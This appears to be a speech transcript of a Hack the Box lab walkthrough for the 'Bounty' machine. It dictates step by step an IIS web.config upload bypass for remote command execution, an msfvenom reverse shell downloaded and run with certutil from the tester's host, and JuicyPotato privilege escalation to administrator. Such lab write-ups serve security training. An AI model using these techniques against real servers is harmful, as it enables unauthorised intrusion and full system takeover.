Hi guys, today we are going to solve the box from Hack the Box, that is bounty. So first of all, let me try to ping that. Are we able to ping? I don't. Yeah, we are able to ping the that machine. So guys, before starting this box, so I would like to elaborate this little bit. So basically this box is we learn 2 or 3 things basically. So first one we will learn the enumeration. So enumeration is a very crucial part of the any penetration testing or any bug bounty thing. So this machine teaches us how important is the enumeration, right? Then we'll exploit file upload vulnerability. Then we'll exploit little or I can say privilege escalation that is based on JuicyPotato. So let's start now. So first of all, we run nmap 10.10 that is sc for default NSC scripts, sv for running version of running services, -v for the verbose mode 10.10.10.93. So yeah, then again I will run nmap with the same switches but with all ports. I include all ports 10.10.10, that is 93. So okay, we got port 80. So let's try to explore this one 10.10.10.93. This is IIS server. Okay, we have Merlin. Okay, yeah, merlin.jpg. So let's run the directory brute force on this machine. I'm using -u, then fudge -w for word list. I'm going to use directory buster word list directory buster, then it's medium 2.3. yeah, then I'll again run a so as per our information gathering, that is, we know this is IAS server website basically. So it will use .aspx and .asp applications, or sorry, files. Then we'll try to also enumerate or brute force the file extensions, word list, I think word list, then directory buster, directory 2.3 -e for .asp. I will go for .asp, .aspx, then .asmx, .asmc. yeah, that would be fine now. So let's wait for the enumeration, then we'll go for the our port nmap scan. So till now we only able to get the port 80 is waiting for the port scanning. So now we can only do for the wait till that time until it enumerate the things. Let me pause the video, and once I'll this nmap scan and directory buster complete of directory brute force complete, I'll resume the video. So welcome back guys. Our FUF able to found transfer.aspx, that is, and another FUF able to found a directory, that is uploaded files, and nmap is still on 7.70%. So let's try to explore these directories and files. First of all, we will go for the transfer.asp, I think. Okay, what was that? .aspx, yeah, my bad. Control Z, Control Z, .aspx, yeah, good to go. Yeah, so we are able to, we can upload a file here, then try to upload a file here, browse. Here I'll try to upload a PNG file, upload. Let's see, yeah, file uploaded. So now we try to access that file 10.10.10.93 s.png. Not found. Okay. So we also have a directory which is uploaded files. Yeah, uploaded files. Then try to access this directory 403. Okay, so we have a file s.png. Yeah, great, we are able to access our file, uploaded file, right? So now let's try to upload .aspx shell. Okay, so for that I'll go to my new terminal and then go to where, let's go to desktop and make directory bounty name, maybe bounty bounty, yeah, cd bounty. Okay, so locate web shells, so cd, it's user share web shells. Okay, they are, it's aspx cd aspx ls. Okay, so we'll try to upload cmd aspx now. So okay, cd, I will copy it, cp. Okay, cd home kali desktop bounty, I think, yeah. So we have nothing here, so we'll copy the web shell, that is location user share web shells aspx, then cmd here. Okay, ls. Okay, so we'll try to upload this one, browse, desktop bounty cmd.aspx, upload. Invalid file. Okay, so guys, as this is IIS server and we are not able to here upload ASP or ASPX web file or reverse shell web shell, so here I found something. I'll type here that rce via web.config. Okay, so here we have a very interesting blog by Soresh Dalil, and he published this blog in 2014, I think. Yes, 2014. Okay, yeah, it's so this shows running a web config as an ASP, sometimes ASP files, but not possible to, yeah. So basically what is web.config? Web.config file is a configuration file of ASP, ASPX websites. So using this web config file, we are able to set some permissions on the directories and give some access management kind of things. So all the web.config format is XML. So let's try to copy this one to our Kali Linux machine. So we have in bounty folder, so I'll go for the gedit. That is my favorite text editor basically. Web.config, I am creating a web.config file, then paste this and save. And what it's showing, that if it says it should not include HTML comments and closing tags. So basically this is a ASP ASP code. So if it works, if our file works, then it will show ASP code. If you can see, then 3 will be printed on the browser, right? So I'll save it, then go to Mozilla, browse, desktop, bounty, web.config, upload. Yeah, we are able to upload. Yes, file uploaded successfully. Then we'll again go 10.10.10.93, then uploaded. Yeah, here we'll try to web.config. Yeah, so our ASPX code is working in web.config file, right? So now we have to get the CMD, basically CMD or any command via web browser. So I'll have a CMD code or ASPX code by which we can run CMD commands, gedit, web.config. So I'm replacing this code with this one. So what I'll do when it execute, it will run a whoami command on CMD, and it will give us a it should give us a current user. So again, go to file transfer, file upload, web.config, open, upload. It's successfully uploaded. Then refresh, it shows 404 not directory. Again I will try this, refresh it, browse, web.config, open, upload, successfully uploaded. Yeah, so it's showing blank page. Try to open the HTML source code. So in HTML source code we are able to see that bounty/Merlin. So it's whoami command is executing. So right now so now we are successfully able to access CMD of the target machine. So now what we are going to do, we are creating an exploit and upload that target machine and try to execute it. So for that I am going to use MSF basically. So we know that this is a Windows machine, so I am going for the window payload -p for payload, Windows/shell, it would be reverse_TCP, then lhost would be my 10.10.14.14, yes 14, then lport I'll go for the 9001, let's see 9001 -f for the format, it would be exe, then output would be, let's say bounty.exe, right? Enter. So I am creating a reverse shell for Windows using MSF and then we'll try to upload this one via our command or reverse that remote code execution which we have via uploading a web.config file, right? So let's wait for a moment until unless it creates a exploit for us. Okay, yeah, so it's created. So we have bounty.exe. Let me remove that cmd.aspx. We not require that. So now we have to put our file bounty.exe to that target machine. So what I'm going to do, I'm running that HTTP server python 3-m http dot server. I will run it on port 81. Okay, so also I will run it as a exit. Let me horizontal. Yeah, I will run netcat lndp. That would be 9001, I guess. Yes. So let me open this, our web config file, and what I'll do, I am replacing whoam command with the certutil, right? Certutil is a command or utility in Windows. By using that, we can able to download the files from a URLs, right? So I'll go for the certutil. That will be URL cache, then split, then -f, then our URL, that would be http 10.10.10.14.14:81/ that would be bounty.exe, right? So we will save it in the target machine on path would be c // why I'm using the // because in Windows sometimes it will escape that slash, right? So it will be users / public, yeah, then named as a same bounty as bounty.exe. After downloading this, I also require need that it will be executed, right? So I'll go for the double ampersand. It will helps us to run two commands in a cmd. That would be c full path of the file, c users public, then we have bounty.exe. yes, save it, received, close, go to browser, secure file transfer, refresh it, browse, web.config, open, upload, file is uploaded successfully, then try to refresh it. Yeah, file not found. Okay, yeah, my bad. I set up this in the cd desktop bounty. I should be in the bounty, right? So I will run python 3. yes, now I'll try to again, then it send a request. Yeah, it tried to download this bounty.exe, and also it run our exploit, execute it, and we got a reverse shell. So who am I? So it's Merlin. Let's try to read the flag cd, that would be c, yeah, c users / where it be Merlin. yes, Merlin desktop dir. So it shows there is no flag here, right? But sometimes there will be hidden files, so we will type attrib and we are able to find our flag. So type and we can read it. So now we have to check who am I? It's Merlin. We don't have administrator permissions. So what we'll do, we'll try to find the system info. We have to escalate the privileges here. So exactly this is Microsoft Windows Server 2008 data center. Okay, and any updates or hotfixes? No. So there are no hotfixes updated here. So also I'll try that who am I priv to check the permissions, right? Privileges. Okay, so disable, yeah. So we have two permissions which are enabled: SC change notify privilege, bypass traverse, and SC impersonate privilege, right? So these are basically two permissions. If these are only enabled on the system, if system Windows system has running IIS or SQL server. So yes, this is Windows 2008 server data center. It is vulnerable to SC impersonate privilege escalation vulnerability, which is used by which we can exploit by JuicyPotato. There is a vulnerability named JuicyPotato, so it used that SC impersonate. So for that you need to download a JuicyPotato exploit into this target machine and run that our reverse shell, right, as a administrator. So for that you can go to the Google and try to learn about the JuicyPotato more. So for that you need a .exe, JuicyPotato.exe. So I already downloaded it. So let me copy it into the bounty folder. I think placed it in the desktop, home, Kali, I think bounty, no, it's desktop, yes, JP. So I'll placing here, yeah. So now we'll try to download the JP dot, which is JuicyPotato, in target machine using setutil command, URL cache -split -f http :/10.10.10.14.14:81/jp.exe. Okay. So it, yeah, let's see what we have. STIR, yes, we are able to download. So let me move to the, we are going to download our bounty.exploit into this desktop folder, setutil -URL cache -split -f. Why we are going to download that bounty again? Because using JuicyPotato we are able to run a program as administrator. So what we are trying to do here, we try to run our bounty.exe exploit as an administrator and try to get the reverse shell as administrator, right? So 10.10.14.14:81/ that would be bounty. Yeah, yes, we got it, dir. So we have both the files. Now we are going to run JP. Before that I will run listener port again, that is 9001. So now our bounty.exe will be run will be execute as a administrator, right? -t for before that I'll show you something. So these are the mandatory arguments, t-p. So I'll tell you what they are. jp.exe -t for the star, it will be CLIDs basically. So you can go to the Google and search what are the CLIDs for the JuicyPotato, that is right. And -p for program, bounty.exe, okay, -l for the port number, which port you want to listen. So I will go for the 9001 because in bounty exploit we'll set it as a 9001. So we'll execute it. Let's wait. So here you can see we got the shell. Who am I? So we are the administrator. So guys, this box teaches me a lot about the enumeration. So during the penetration testing we thought information gathering and enumeration is not much, but yes, as you can see from a result of FUF, different results of FUF. So from this we are able to find the transfer.espx, but with this we are only able to find the upload files. And it also teaches me about JuicyPotato, SC privilege, impersonate privilege escalations. So guys, you can also, I recommend you go to the Google and try to learn about a little bit more about the JuicyPotatos. So thank you guys, hope you like my work. If you have any doubts, queries, please post into the comments. I'll happy to answer all of them. Thanks.